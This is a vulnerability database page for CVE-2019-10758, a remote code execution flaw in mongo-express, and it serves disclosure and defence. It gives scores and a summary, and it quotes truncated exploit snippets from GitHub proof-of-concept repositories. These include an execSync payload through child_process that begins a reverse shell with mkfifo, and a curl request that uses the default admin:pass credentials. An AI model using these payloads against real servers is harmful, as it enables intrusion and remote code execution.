Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
9
CVSSv2

CVE-2019-10758

Published: 24/12/2019 Updated: 02/01/2020
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 9.9 | Impact Score: 6 | Exploitability Score: 3.1
VMScore: 802
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
Subscribe to Mongo-express

Vulnerability Summary

mongo-express prior to 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

mongo-express project mongo-express

Github Repositories

https://github.com/lp008/CVE-2019-10758

CVE-2019-10758

CVE-2019-10758 mongo-express远程代码执行,反弹shell代码如下: POST BODY 1: document=thisconstructorconstructor("return process")()mainModulerequire("child_process")execSync("mkfifo /tmp/f") POST BODY 2: document=thisconstructorconstructor("return process")()mainModulerequire("child_process")execSync(&qu

https://github.com/masahiro331/CVE-2019-10758

CVE-2019-10758 PoC Setup docker run -p 27017:27017 -d mongo npm install mongo-express@0530 cd node_modules/mongo-express/ && node appjs cURL exploit curl 'localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=thisconstructorconstructor("return pro

https://github.com/cyberharsh/mongo10758

mongo-express 远程代码执行漏洞(CVE-2019-10758) mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意nodejs代码。 漏洞环境 执行如下命令启动一个0530版本的mongo-express: docker-compose up

References

NVD-CWE-noinfohttps://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215https://nvd.nist.govhttps://github.com/lp008/CVE-2019-10758
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
NULL pointer dereferenceCVE-2023-52689CVE-2024-23803client sideCVE-2023-52696information disclosureCVE-2024-35843CVE-2024-27130CVE-2023-52697
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook